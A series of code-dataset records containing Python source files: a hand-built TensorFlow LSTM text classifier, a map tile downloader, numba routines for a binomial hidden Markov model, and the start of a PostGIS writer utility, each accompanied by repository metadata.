len(self.inputs):\r\n            self._shuffle_data()\r\n            self.index = 0\r\n            end_index = batch_size\r\n        # return one batch of data by index\r\n        batch_inputs = self.inputs[self.index:end_index]\r\n        batch_labels = self.labels[self.index:end_index]\r\n        self.index = end_index\r\n        return batch_inputs, batch_labels\r\n\r\n    # get the vocabulary size\r\n    def get_size(self):\r\n        return self.content_size\r\n\r\n\r\n# training data set object\r\ntrain_set = TextData(train_segment_dir, train_list)\r\n# print(data_set.next_batch(10))\r\n# number of tokens in the training vocabulary\r\ntrain_list_size = train_set.get_size()\r\nprint('list length', train_list_size)\r\n\r\n\r\n# build the computation graph\r\ndef create_model(list_size, num_classes):\r\n    # input and output placeholders\r\n    inputs = tf.placeholder(tf.int32, (batch_size, max_words))\r\n    outputs = tf.placeholder(tf.int32, (batch_size,))\r\n    # keep probability for dropout\r\n    keep_prob = tf.placeholder(tf.float32, name='keep_rate')\r\n    # track the total number of training steps\r\n    global_steps = tf.Variable(tf.zeros([], tf.float32), name='global_steps', trainable=False)\r\n\r\n    # turn the input ids into embedding vectors\r\n    with tf.variable_scope('embedding',\r\n                           initializer=tf.random_normal_initializer(-1.0, 1.0)):\r\n        embeddings = tf.get_variable('embedding', [list_size, embedding_size], tf.float32)\r\n        # gather the embedding rows for the given ids\r\n        embedded_inputs = tf.nn.embedding_lookup(embeddings, inputs)\r\n\r\n    # build the LSTM network\r\n    
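# Editor's sketch (hedged): the block below hand-rolls one LSTM layer with the standard gate\r\n    # equations, assuming lstm_nodes[0] hidden units:\r\n    #   f = sigmoid(x*W_xf + h*W_hf + b_f);  i and o are analogous;  c_tilde = tanh(x*W_xm + h*W_hm + b_m)\r\n    #   state = f*state + i*c_tilde;  h = o*tanh(state)\r\n    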
# generate the x-weight, h-weight and bias parameters a single gate needs\r\n    def _generate_paramas(x_size, h_size, b_size):\r\n        x_w = tf.get_variable('x_weight', x_size)\r\n        h_w = tf.get_variable('h_weight', h_size)\r\n        bias = tf.get_variable('bias', b_size, initializer=tf.constant_initializer(0.0))\r\n        return x_w, h_w, bias\r\n\r\n    scale = 1.0 / math.sqrt(embedding_size + lstm_nodes[-1]) / 3.0\r\n    lstm_init = tf.random_uniform_initializer(-scale, scale)\r\n    with tf.variable_scope('lstm_nn', initializer=lstm_init):\r\n        '''\r\n        # build a two-layer lstm with the library functions; each layer has lstm_nodes[i] nodes\r\n        cells = []\r\n        for i in range(lstm_layers):\r\n            cell = tf.contrib.rnn.BasicLSTMCell(lstm_nodes[i], state_is_tuple=True)\r\n            # apply dropout\r\n            cell = tf.contrib.rnn.DropoutWrapper(cell, output_keep_prob=keep_prob)\r\n            cells.append(cell)\r\n        # stack the two lstm cells\r\n        cell = tf.contrib.rnn.MultiRNNCell(cells)\r\n        # feed embedded_inputs through the RNN for training\r\n        initial_state = cell.zero_state(batch_size, tf.float32)\r\n        # rnn_output: [batch_size, num_timestep, lstm_nodes[-1]]\r\n        rnn_output, _ = tf.nn.dynamic_rnn(cell, embedded_inputs, initial_state=initial_state)\r\n        last_output = rnn_output[:, -1, :]\r\n        '''\r\n\r\n        # input gate\r\n        with tf.variable_scope('input'):\r\n            x_in, h_in, b_in = _generate_paramas(\r\n                x_size=[embedding_size, lstm_nodes[0]],\r\n                h_size=[lstm_nodes[0], lstm_nodes[0]],\r\n                b_size=[1, lstm_nodes[0]]\r\n            )\r\n        # output gate\r\n        with tf.variable_scope('output'):\r\n            x_out, h_out, b_out = _generate_paramas(\r\n                x_size=[embedding_size, lstm_nodes[0]],\r\n                h_size=[lstm_nodes[0], lstm_nodes[0]],\r\n                b_size=[1, lstm_nodes[0]]\r\n            )\r\n        # forget gate\r\n        with tf.variable_scope('forget'):\r\n            x_f, h_f, b_f = _generate_paramas(\r\n                x_size=[embedding_size, lstm_nodes[0]],\r\n                h_size=[lstm_nodes[0], lstm_nodes[0]],\r\n                b_size=[1, lstm_nodes[0]]\r\n            )\r\n        # candidate (intermediate) state\r\n        with tf.variable_scope('mid_state'):\r\n            x_m, h_m, b_m = _generate_paramas(\r\n                x_size=[embedding_size, lstm_nodes[0]],\r\n                h_size=[lstm_nodes[0], lstm_nodes[0]],\r\n                b_size=[1, lstm_nodes[0]]\r\n            )\r\n        # two initial states: the cell state and the initial hidden output h\r\n        state = tf.Variable(tf.zeros([batch_size, lstm_nodes[0]]), trainable=False)\r\n        h = tf.Variable(tf.zeros([batch_size, lstm_nodes[0]]), trainable=False)\r\n        # step through the input word by word\r\n        for i in range(max_words):\r\n            # take this step's input; the second axis of embedded_inputs is the time step\r\n            embedded_input = embedded_inputs[:, i, :]\r\n            # reshape the slice to two dimensions\r\n            embedded_input = tf.reshape(embedded_input, [batch_size, embedding_size])\r\n            # forget gate activation\r\n            forget_gate = tf.sigmoid(tf.matmul(embedded_input, x_f) + tf.matmul(h, h_f) + b_f)\r\n            # input gate activation\r\n            input_gate = tf.sigmoid(tf.matmul(embedded_input, x_in) + tf.matmul(h, h_in) + b_in)\r\n            # output gate activation\r\n            output_gate = tf.sigmoid(tf.matmul(embedded_input, x_out) + tf.matmul(h, h_out) + b_out)\r\n            # candidate state\r\n            mid_state = tf.tanh(tf.matmul(embedded_input, x_m) + tf.matmul(h, h_m) + b_m)\r\n            # update the cell state and the hidden output h\r\n            state = state * forget_gate + input_gate * mid_state\r\n            h = output_gate * tf.tanh(state)\r\n        # the value after the final step is the LSTM output\r\n        last_output = h\r\n
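\r\n    # Editor's note (hedged): after the loop above, last_output = h has shape [batch_size, lstm_nodes[0]]\r\n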
\r\n    # build the fully connected head\r\n    fc_init = tf.uniform_unit_scaling_initializer(factor=1.0)\r\n    with tf.variable_scope('fc', initializer=fc_init):\r\n        fc1 = tf.layers.dense(last_output, fc_nodes, activation=tf.nn.relu, name='fc1')\r\n        fc1_drop = tf.contrib.layers.dropout(fc1, keep_prob)\r\n        logits = tf.layers.dense(fc1_drop, num_classes, name='fc2')\r\n\r\n    # define the evaluation metrics\r\n    with tf.variable_scope('matrics'):\r\n        # compute the loss\r\n        softmax_loss = tf.nn.sparse_softmax_cross_entropy_with_logits(logits=logits, labels=outputs)\r\n        loss = tf.reduce_mean(softmax_loss)\r\n        # compute the predictions: the index of the maximum along axis 1, e.g. [1,1,5,3,2] argmax=> 2\r\n        y_pred = tf.argmax(tf.nn.softmax(logits), 1, output_type=tf.int32)\r\n        # compute the accuracy\r\n        correct_prediction = tf.equal(outputs, y_pred)\r\n        accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))\r\n\r\n    # define the training op\r\n    with tf.variable_scope('train_op'):\r\n        train_var = tf.trainable_variables()\r\n        # for var in train_var:\r\n        #     print(var)\r\n        # clip the gradients to avoid vanishing or exploding gradients\r\n        grads, _ = tf.clip_by_global_norm(tf.gradients(loss, train_var), clip_norm=lstm_grads)\r\n        # apply the gradients to the variables\r\n        optimizer = tf.train.AdamOptimizer(learning_rate=learning_rate)\r\n        train_op = optimizer.apply_gradients(zip(grads, train_var), global_steps)\r\n\r\n    # return the results as tuples\r\n    return ((inputs, outputs, keep_prob),\r\n            (loss, accuracy),\r\n            (train_op, global_steps))\r\n\r\n\r\n# run the model builder and unpack the returned handles\r\nplaceholders, matrics, others = create_model(train_list_size, num_classes)\r\ninputs, outputs, keep_prob = placeholders\r\nloss, accuracy = matrics\r\ntrain_op, global_steps = others\r\n\r\n# training\r\ninit_op = tf.global_variables_initializer()\r\ntrain_keep_prob = 0.8 # dropout keep rate on the training set\r\ntrain_steps = 10000\r\n\r\nwith tf.Session() as sess:\r\n    sess.run(init_op)\r\n\r\n    for i in range(train_steps):\r\n        # fetch one batch of training data\r\n        batch_inputs, batch_labels = train_set.next_batch(batch_size)\r\n        # run the graph\r\n        res = sess.run([loss, accuracy, train_op, global_steps],\r\n                       feed_dict={inputs: batch_inputs, outputs: batch_labels,\r\n                                  keep_prob: train_keep_prob})\r\n        loss_val, acc_val, _, g_step_val = res\r\n        if g_step_val % 20 == 0:\r\n            print('step %d: loss %3.3f, accuracy %3.5f' % (g_step_val, loss_val, acc_val))\r\n", "repo_name": "SuperTory/MachineLearning", "sub_path": "TextRNN/TextRNN.py", "file_name": "TextRNN.py", "file_ext": "py", "file_size_in_byte": 14644, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "41", "api": [{"api_name": "os.walk", "line_number": 15, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 20, "usage_type": "call"}, {"api_name": "os.path", "line_number": 20, "usage_type": "attribute"}, {"api_name": "jieba.cut", "line_number": 25, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 146, "usage_type": "call"}, {"api_name": "numpy.int32", "line_number": 146, "usage_type": "attribute"}, {"api_name": "numpy.asarray", "line_number": 147, "usage_type": "call"}, {"api_name": "numpy.int32", "line_number": 147, "usage_type": "attribute"}, {"api_name": "numpy.random.permutation", "line_number": 152, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 152, "usage_type": "attribute"}, {"api_name": "tensorflow.placeholder", "line_number": 187, "usage_type": "call"}, {"api_name": "tensorflow.int32", "line_number": 187, "usage_type": "attribute"}, {"api_name": "tensorflow.placeholder", "line_number": 188, "usage_type": "call"}, {"api_name": "tensorflow.int32", "line_number": 188, "usage_type": "attribute"}, {"api_name": "tensorflow.placeholder", "line_number": 190, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 190, "usage_type": "attribute"}, {"api_name": "tensorflow.Variable", "line_number": 192, "usage_type": "call"}, {"api_name": "tensorflow.zeros", "line_number": 192, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 192, "usage_type": "attribute"}, {"api_name": "tensorflow.variable_scope", "line_number": 195, "usage_type": "call"}, {"api_name": "tensorflow.random_normal_initializer", "line_number": 196, "usage_type": "call"}, {"api_name": "tensorflow.get_variable", "line_number": 197, "usage_type": 
"call"}, {"api_name": "tensorflow.float32", "line_number": 197, "usage_type": "attribute"}, {"api_name": "tensorflow.nn.embedding_lookup", "line_number": 199, "usage_type": "call"}, {"api_name": "tensorflow.nn", "line_number": 199, "usage_type": "attribute"}, {"api_name": "tensorflow.get_variable", "line_number": 204, "usage_type": "call"}, {"api_name": "tensorflow.get_variable", "line_number": 205, "usage_type": "call"}, {"api_name": "tensorflow.get_variable", "line_number": 206, "usage_type": "call"}, {"api_name": "tensorflow.constant_initializer", "line_number": 206, "usage_type": "call"}, {"api_name": "math.sqrt", "line_number": 209, "usage_type": "call"}, {"api_name": "tensorflow.random_uniform_initializer", "line_number": 210, "usage_type": "call"}, {"api_name": "tensorflow.variable_scope", "line_number": 211, "usage_type": "call"}, {"api_name": "tensorflow.variable_scope", "line_number": 230, "usage_type": "call"}, {"api_name": "tensorflow.variable_scope", "line_number": 237, "usage_type": "call"}, {"api_name": "tensorflow.variable_scope", "line_number": 244, "usage_type": "call"}, {"api_name": "tensorflow.variable_scope", "line_number": 251, "usage_type": "call"}, {"api_name": "tensorflow.Variable", "line_number": 258, "usage_type": "call"}, {"api_name": "tensorflow.zeros", "line_number": 258, "usage_type": "call"}, {"api_name": "tensorflow.Variable", "line_number": 259, "usage_type": "call"}, {"api_name": "tensorflow.zeros", "line_number": 259, "usage_type": "call"}, {"api_name": "tensorflow.reshape", "line_number": 265, "usage_type": "call"}, {"api_name": "tensorflow.sigmoid", "line_number": 267, "usage_type": "call"}, {"api_name": "tensorflow.matmul", "line_number": 267, "usage_type": "call"}, {"api_name": "tensorflow.sigmoid", "line_number": 269, "usage_type": "call"}, {"api_name": "tensorflow.matmul", "line_number": 269, "usage_type": "call"}, {"api_name": "tensorflow.sigmoid", "line_number": 271, "usage_type": "call"}, {"api_name": "tensorflow.matmul", "line_number": 271, "usage_type": "call"}, {"api_name": "tensorflow.tanh", "line_number": 273, "usage_type": "call"}, {"api_name": "tensorflow.matmul", "line_number": 273, "usage_type": "call"}, {"api_name": "tensorflow.tanh", "line_number": 276, "usage_type": "call"}, {"api_name": "tensorflow.uniform_unit_scaling_initializer", "line_number": 281, "usage_type": "call"}, {"api_name": "tensorflow.variable_scope", "line_number": 282, "usage_type": "call"}, {"api_name": "tensorflow.layers.dense", "line_number": 283, "usage_type": "call"}, {"api_name": "tensorflow.layers", "line_number": 283, "usage_type": "attribute"}, {"api_name": "tensorflow.nn", "line_number": 283, "usage_type": "attribute"}, {"api_name": "tensorflow.contrib.layers.dropout", "line_number": 284, "usage_type": "call"}, {"api_name": "tensorflow.contrib", "line_number": 284, "usage_type": "attribute"}, {"api_name": "tensorflow.layers.dense", "line_number": 285, "usage_type": "call"}, {"api_name": "tensorflow.layers", "line_number": 285, "usage_type": "attribute"}, {"api_name": "tensorflow.variable_scope", "line_number": 288, "usage_type": "call"}, {"api_name": "tensorflow.nn.sparse_softmax_cross_entropy_with_logits", "line_number": 290, "usage_type": "call"}, {"api_name": "tensorflow.nn", "line_number": 290, "usage_type": "attribute"}, {"api_name": "tensorflow.reduce_mean", "line_number": 291, "usage_type": "call"}, {"api_name": "tensorflow.argmax", "line_number": 293, "usage_type": "call"}, {"api_name": "tensorflow.nn.softmax", "line_number": 293, "usage_type": 
"call"}, {"api_name": "tensorflow.nn", "line_number": 293, "usage_type": "attribute"}, {"api_name": "tensorflow.int32", "line_number": 293, "usage_type": "attribute"}, {"api_name": "tensorflow.equal", "line_number": 295, "usage_type": "call"}, {"api_name": "tensorflow.reduce_mean", "line_number": 296, "usage_type": "call"}, {"api_name": "tensorflow.cast", "line_number": 296, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 296, "usage_type": "attribute"}, {"api_name": "tensorflow.variable_scope", "line_number": 299, "usage_type": "call"}, {"api_name": "tensorflow.trainable_variables", "line_number": 300, "usage_type": "call"}, {"api_name": "tensorflow.clip_by_global_norm", "line_number": 304, "usage_type": "call"}, {"api_name": "tensorflow.gradients", "line_number": 304, "usage_type": "call"}, {"api_name": "tensorflow.train.AdamOptimizer", "line_number": 306, "usage_type": "call"}, {"api_name": "tensorflow.train", "line_number": 306, "usage_type": "attribute"}, {"api_name": "tensorflow.global_variables_initializer", "line_number": 322, "usage_type": "call"}, {"api_name": "tensorflow.Session", "line_number": 326, "usage_type": "call"}]} +{"seq_id": "45450326941", "text": "import sys\nimport os\nimport math\nimport imghdr\nfrom globalmaptiles import GlobalMercator\nfrom downloader import Downloader\n\nclass TileLoader(object):\n TILE_WIDTH = 256 # tile is square\n TILE_FORMAT = 'png'\n\n def __init__(self, min_lat, min_lon, max_lat, max_lon, width, max_zoom = 18):\n self.tiles = []\n self.min_lat = min_lat\n self.min_lon = min_lon\n self.max_lat = max_lat\n self.max_lon = max_lon\n self.mercator = GlobalMercator()\n self.downloader = Downloader()\n # count how many horizontal tiles we need\n self.x_tiles_needed = math.ceil(width / self.TILE_WIDTH)\n self.max_zoom = max_zoom\n\n def download(self, cache_dir, url, http_headers):\n \"\"\"Downloads tiles and returns list of downloaded tiles.\"\"\"\n tile_files = {}\n tiles = self._get_tile_list()\n for (tx, ty, tz) in tiles:\n cx, cy, cz = self._convert_tile(tx, ty, tz)\n tile_url = url.replace('{x}', str(cx)).replace('{y}', str(cy)).replace('{z}', str(cz))\n tile_file = self._gen_tile_file(tx, ty, tz, cache_dir)\n self.downloader.download(tile_file, tile_url, http_headers)\n tile_files[tile_url] = tile_file\n\n # wait downloads to be finished\n self.downloader.wait()\n\n # validate all tiles\n valid = True\n for tile_url, tile_file in tile_files.iteritems():\n if self.TILE_FORMAT == 'png' and imghdr.what(tile_file) != 'png':\n sys.stderr.write(\"%s is not PNG image\\n\" % tile_url)\n valid = False\n if not valid:\n return None\n\n return tile_files.values()\n\n def _get_tile_list(self):\n \"\"\"Returns list of tiles needed to cover bounding box.\"\"\"\n tiles = []\n tile_info = self._find_tiles()\n if tile_info is not None:\n (tminx, tminy, tmaxx, tmaxy, tz) = tile_info\n for ty in range(tminy, tmaxy + 1):\n for tx in range(tminx, tmaxx + 1):\n tiles.append((tx, ty, tz))\n return tiles\n\n def _find_tiles(self):\n \"\"\"Returns optimal zoom level based on given width.\"\"\"\n for zoom_level in range(1, self.max_zoom + 1):\n tminx, tminy = self._lat_lon_to_tile(self.min_lat, self.min_lon, zoom_level)\n tmaxx, tmaxy = self._lat_lon_to_tile(self.max_lat, self.max_lon, zoom_level)\n x_tiles = tmaxx + 1 - tminx\n if x_tiles > self.x_tiles_needed or zoom_level == self.max_zoom:\n # optimal zoom level found\n return (tminx, tminy, tmaxx, tmaxy, zoom_level)\n return None\n\n def _lat_lon_to_tile(self, lat, lon, zoom_level):\n 
\"\"\"Converts given latLon to tile XY\"\"\"\n mx, my = self.mercator.LatLonToMeters(lat, lon)\n tx, ty = self.mercator.MetersToTile(mx, my, zoom_level)\n return (tx, ty)\n\n def _gen_tile_file(self, tx, ty, tz, cache_dir):\n \"\"\"Returns filename where tile will be saved as.\"\"\"\n filename = \"%d_%d_%d.%s\" % (tx, ty, tz, self.TILE_FORMAT)\n return os.path.join(cache_dir, filename)\n\nclass TMSTileLoader(TileLoader):\n def _convert_tile(self, tx, ty, tz):\n return tx, ty, tz\n\nclass GoogleTileLoader(TileLoader):\n def _convert_tile(self, tx, ty, tz):\n gx, gy = self.mercator.GoogleTile(tx, ty, tz)\n return gx, gy, tz\n\nclass FTileLoader(TileLoader):\n def _convert_tile(self, tx, ty, tz):\n fx = tx - 2**(tz - 1)\n fy = ty - 2**(tz - 1)\n fz = 18 - tz\n return fx, fy, fz\n", "repo_name": "iqqmuT/toe", "sub_path": "export/mapnik/tileloader.py", "file_name": "tileloader.py", "file_ext": "py", "file_size_in_byte": 3565, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "41", "api": [{"api_name": "globalmaptiles.GlobalMercator", "line_number": 18, "usage_type": "call"}, {"api_name": "downloader.Downloader", "line_number": 19, "usage_type": "call"}, {"api_name": "math.ceil", "line_number": 21, "usage_type": "call"}, {"api_name": "imghdr.what", "line_number": 41, "usage_type": "call"}, {"api_name": "sys.stderr.write", "line_number": 42, "usage_type": "call"}, {"api_name": "sys.stderr", "line_number": 42, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 80, "usage_type": "call"}, {"api_name": "os.path", "line_number": 80, "usage_type": "attribute"}]} +{"seq_id": "73073752764", "text": "import numpy as np\nfrom numba import njit\nfrom numba import prange\n\n@njit\ndef logsumexp(log_mat, axis = 0):\n \"\"\"\n -----------------------------------------------------------------\n Arguments: - log_mat, 2D numpy array\n - axis, int\n -----------------------------------------------------------------\n -----------------------------------------------------------------\n This function implements a numerically stable version of the\n logsumexp function along a given axis.\n\n It takes as input the log of a matrix and returns the log of the\n sum along an axis of the exponential of the matrix.\n -----------------------------------------------------------------\n \"\"\"\n nconst = np.max(log_mat)\n out = np.sum(np.exp(log_mat - nconst), axis = axis)\n return nconst + np.log(out)\n\n\n@njit\ndef log_domain_matmul(log_A, log_B):\n \"\"\"\n -----------------------------------------------------------------\n Arguments: - log_A, 2D numpy array of shape m x n\n - log_B, 2D numpy array of shape n x p\n -----------------------------------------------------------------\n -----------------------------------------------------------------\n This function implements the log version of the multiplication\n between two matrices C_{ij} = \\sum_k A_{ik} B_{kj}, which gives\n\n \\log C_{ij} = \\log \\sum_{k} \\exp[log A_{ik} + log B_{k,j}]\n\n so we can work with the log of the matrices directly.\n -----------------------------------------------------------------\n \"\"\"\n\n m = log_A.shape[0]\n n = log_A.shape[1]\n p = log_B.shape[1]\n\n elementwise_sum = np.empty((m, p, n), dtype = np.float64)\n log_A_hD = np.empty((m, n, 1), dtype = np.float64)\n log_B_hD = np.empty((1, n, p), dtype = np.float64)\n\n log_A_hD = np.expand_dims(log_A, axis = 2)\n log_B_hD = np.expand_dims(log_B, axis = 0)\n elementwise_sum = log_A_hD + log_B_hD\n\n return 
logsumexp(elementwise_sum, axis = 1)\n\n\n@njit(parallel = True)\ndef emission_model(log_emission_matrix, x):\n \"\"\"\n -----------------------------------------------------------------\n Arguments: - log_emission_matrix, 2D numpy array of shape N x D\n - x, 1D numpy array of shape T\n -----------------------------------------------------------------\n -----------------------------------------------------------------\n This function evaluates the log of the probability of observing\n the sequence of observed states x given that the system is in the\n i-th hidden state at time t. x is observed for T timesteps, x[t]\n is a D-dimensional array and the system can be in N hidden states.\n\n The result is a T x N matrix where each column gives the logarithm\n of the probability of observing x[t] for each of the hidden states\n the system can be in.\n -----------------------------------------------------------------\n \"\"\"\n emission_matrix = np.exp(log_emission_matrix)\n T = x.shape[0]\n N = emission_matrix.shape[0]\n emission_probabilities = np.empty((T, N), dtype = np.float64)\n\n # Note: must avoid the fact that numba does not support the axis kwarg\n # in the product function; implement using a bunch of for cycles that\n # are later deployed in C. Parallelize the execution over time\n\n for t in prange(T):\n to_marginalize = emission_matrix*x[t] + (1-emission_matrix)*(1-x[t])\n for i in range(to_marginalize.shape[0]):\n marg = 1\n for j in range(to_marginalize.shape[1]):\n marg *= to_marginalize[i][j]\n\n emission_probabilities[t][i] = marg\n\n # double pass to free the array from the prange bug\n to_log = emission_probabilities\n return np.log(to_log)\n\n\n@njit\ndef forward_backward(log_emission_probabilities, log_transition_matrix, log_state_priors):\n \"\"\"\n -----------------------------------------------------------------\n Arguments: - log_emission_probabilities, 2D numpy array of shape\n T x N\n - log_transition_matrix, 2D numpy array of shape\n N x N\n - log_state_priors, 1D numpy array of shape N\n -----------------------------------------------------------------\n -----------------------------------------------------------------\n This function evaluates in a single pass the log of the forward\n and the backward probabilities of the Hidden Markov Model.\n -----------------------------------------------------------------\n \"\"\"\n\n T, N = log_emission_probabilities.shape\n log_alpha = np.empty((T, N), dtype = np.float64)\n log_beta = np.empty((T, N), dtype = np.float64)\n\n log_beta[T-1] = np.zeros(N, dtype = np.float64)\n log_alpha[0] = log_emission_probabilities[0] + log_state_priors\n\n for t in range(1, T):\n a_matrix_mult = log_domain_matmul(log_alpha[t-1].reshape(1, N), log_transition_matrix)\n log_alpha[t] = log_emission_probabilities[t] + a_matrix_mult\n\n b_elementwise_mult = log_emission_probabilities[T-t] + log_beta[T-t]\n b_matrix_mult = log_domain_matmul(log_transition_matrix, b_elementwise_mult.reshape(N,1))\n log_beta[T-t-1] = b_matrix_mult.reshape(-1)\n\n return log_alpha, log_beta\n\n\n@njit\ndef evaluate_log_gamma(log_alpha, log_beta):\n \"\"\"\n -----------------------------------------------------------------\n Arguments: - log_alpha, 2D numpy array of shape T x N\n - log_beta, 2D numpy array of shape T x N\n -----------------------------------------------------------------\n -----------------------------------------------------------------\n This function evaluates the probability that the Hidden Markov\n Model is in one of the possible hidden states at 
each time, given\n its parameters (that are encoded in the forward and backward\n probabilities).\n -----------------------------------------------------------------\n \"\"\"\n g = np.empty(log_alpha.shape, dtype = np.float64)\n g = log_alpha + log_beta\n return g - np.expand_dims(logsumexp(g, axis = 1), axis = 1)\n\n\n@njit\ndef evaluate_log_xi(log_gamma, log_beta, log_transition_matrix, log_emission_probabilities):\n \"\"\"\n -----------------------------------------------------------------\n Arguments: - log_gamma, 2D numpy array of shape T x N\n - log_transition_matrix, 2D numpy array of shape\n N x N\n - log_emission_probabilities, 2D numpy array of shape\n T x N\n - log_beta, 2D numpy array of shape T x N\n -----------------------------------------------------------------\n -----------------------------------------------------------------\n This function evaluates the probability that the Hidden Markov\n Model occupies a given pair of hidden states at consecutive\n times (t-1, t), given its parameters.\n -----------------------------------------------------------------\n \"\"\"\n T = log_gamma.shape[0]\n N = log_gamma.shape[1]\n log_xi = np.empty((T-1, N, N), dtype = np.float64)\n\n log_xi = np.expand_dims(log_gamma[:-1], axis = 2) + log_transition_matrix \\\n + np.expand_dims(log_emission_probabilities[1:], axis = 1) \\\n + np.expand_dims(log_beta[1:], axis = 1) \\\n - np.expand_dims(log_beta[:-1], axis = 2)\n\n return log_xi\n\n@njit\ndef M_step(log_gamma, log_xi, log_transition_matrix, x):\n \"\"\"\n -----------------------------------------------------------------\n Arguments: - log_gamma, 2D numpy array of shape T x N\n - log_xi, 3D numpy array of shape (T - 1) x N x N\n - log_transition_matrix, 2D numpy array of shape\n N x N\n - x, 2D numpy array of shape T x D\n -----------------------------------------------------------------\n -----------------------------------------------------------------\n This function performs the maximization step for a D-dimensional\n binomial Hidden Markov Model. 
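(For reference, and assuming the standard Baum-Welch re-estimation\n step: in log space the updates implemented below read\n log pi_i = log gamma_1(i),\n log A_ij = logsumexp_t log xi_t(i,j) - logsumexp_(t<T) log gamma_t(i),\n with an analogous normalized ratio for the emission matrix.)\n 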
The M-step evaluates a new set of\n parameters to maximize the overall likelihood of the model for\n the observed data.\n -----------------------------------------------------------------\n \"\"\"\n\n T = log_gamma.shape[0]\n N = log_gamma.shape[1]\n D = x.shape[1]\n\n up_log_state_prior = np.empty(N, dtype = np.float64)\n up_log_transition_matrix = np.empty((N, N), dtype = np.float64)\n up_log_emission_matrix = np.empty((N, D), dtype = np.float64)\n\n up_log_state_prior = log_gamma[0]\n up_log_transition_matrix = logsumexp(log_xi, axis = 0) \\\n - np.expand_dims(logsumexp(log_gamma[:-1], axis = 0), axis = 1)\n\n up_log_emission_matrix = log_domain_matmul(log_gamma.T, np.log(x)) \\\n - np.expand_dims(logsumexp(log_gamma, axis = 0), axis = 1)\n\n return up_log_state_prior, up_log_transition_matrix, up_log_emission_matrix\n", "repo_name": "giorgionicoletti/binomial_hmm", "sub_path": "lib/fun.py", "file_name": "fun.py", "file_ext": "py", "file_size_in_byte": 8865, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "numpy.max", "line_number": 20, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 21, "usage_type": "call"}, {"api_name": "numpy.exp", "line_number": 21, "usage_type": "call"}, {"api_name": "numpy.log", "line_number": 22, "usage_type": "call"}, {"api_name": "numba.njit", "line_number": 5, "usage_type": "name"}, {"api_name": "numpy.empty", "line_number": 46, "usage_type": "call"}, {"api_name": "numpy.float64", "line_number": 46, "usage_type": "attribute"}, {"api_name": "numpy.empty", "line_number": 47, "usage_type": "call"}, {"api_name": "numpy.float64", "line_number": 47, "usage_type": "attribute"}, {"api_name": "numpy.empty", "line_number": 48, "usage_type": "call"}, {"api_name": "numpy.float64", "line_number": 48, "usage_type": "attribute"}, {"api_name": "numpy.expand_dims", "line_number": 50, "usage_type": "call"}, {"api_name": "numpy.expand_dims", "line_number": 51, "usage_type": "call"}, {"api_name": "numba.njit", "line_number": 25, "usage_type": "name"}, {"api_name": "numpy.exp", "line_number": 75, "usage_type": "call"}, {"api_name": "numpy.empty", "line_number": 78, "usage_type": "call"}, {"api_name": "numpy.float64", "line_number": 78, "usage_type": "attribute"}, {"api_name": "numba.prange", "line_number": 84, "usage_type": "call"}, {"api_name": "numpy.log", "line_number": 95, "usage_type": "call"}, {"api_name": "numba.njit", "line_number": 57, "usage_type": "call"}, {"api_name": "numpy.empty", "line_number": 115, "usage_type": "call"}, {"api_name": "numpy.float64", "line_number": 115, "usage_type": "attribute"}, {"api_name": "numpy.empty", "line_number": 116, "usage_type": "call"}, {"api_name": "numpy.float64", "line_number": 116, "usage_type": "attribute"}, {"api_name": "numpy.zeros", "line_number": 118, "usage_type": "call"}, {"api_name": "numpy.float64", "line_number": 118, "usage_type": "attribute"}, {"api_name": "numba.njit", "line_number": 98, "usage_type": "name"}, {"api_name": "numpy.empty", "line_number": 146, "usage_type": "call"}, {"api_name": "numpy.float64", "line_number": 146, "usage_type": "attribute"}, {"api_name": "numpy.expand_dims", "line_number": 148, "usage_type": "call"}, {"api_name": "numba.njit", "line_number": 132, "usage_type": "name"}, {"api_name": "numpy.empty", "line_number": 170, "usage_type": "call"}, {"api_name": "numpy.float64", "line_number": 170, "usage_type": "attribute"}, {"api_name": "numpy.expand_dims", "line_number": 172, "usage_type": 
"call"}, {"api_name": "numpy.expand_dims", "line_number": 173, "usage_type": "call"}, {"api_name": "numpy.expand_dims", "line_number": 174, "usage_type": "call"}, {"api_name": "numpy.expand_dims", "line_number": 175, "usage_type": "call"}, {"api_name": "numba.njit", "line_number": 151, "usage_type": "name"}, {"api_name": "numpy.empty", "line_number": 201, "usage_type": "call"}, {"api_name": "numpy.float64", "line_number": 201, "usage_type": "attribute"}, {"api_name": "numpy.empty", "line_number": 202, "usage_type": "call"}, {"api_name": "numpy.float64", "line_number": 202, "usage_type": "attribute"}, {"api_name": "numpy.empty", "line_number": 203, "usage_type": "call"}, {"api_name": "numpy.float64", "line_number": 203, "usage_type": "attribute"}, {"api_name": "numpy.expand_dims", "line_number": 207, "usage_type": "call"}, {"api_name": "numpy.log", "line_number": 209, "usage_type": "call"}, {"api_name": "numpy.expand_dims", "line_number": 210, "usage_type": "call"}, {"api_name": "numba.njit", "line_number": 179, "usage_type": "name"}]} +{"seq_id": "6534495064", "text": "from typing import Callable, List, Union\nimport graph_build.graph_green_view_join.env as env\nimport pandas as pd\nfrom geopandas import GeoDataFrame\nfrom sqlalchemy import create_engine, inspect, text\nfrom functools import partial\n\n\ndef __get_conn_string(db: str) -> str:\n return f'postgresql://{env.db_user}:{env.db_pass}@{env.db_host}:{env.db_port}/{db}'\n\n\ndef __write_to_postgis(\n log,\n sql_engine,\n gdf: GeoDataFrame,\n table_name: str,\n if_exists: str = 'replace',\n index: bool = False\n) -> None:\n\n log.info('Writing GeoDataFrame to PostGIS:')\n log.info(f'{gdf.head()}')\n\n gdf.to_postgis(\n table_name,\n sql_engine,\n if_exists=if_exists,\n chunksize=50000,\n index=index\n )\n\n __execute_sql(log, sql_engine, f'''\n ALTER TABLE {table_name} RENAME COLUMN geometry TO geom;\n ALTER INDEX idx_{table_name}_geometry\n RENAME TO idx_{table_name}_geom;\n ''')\n\n\ndef get_db_writer(\n log,\n b_inspect: bool = False,\n inspect_table: str = 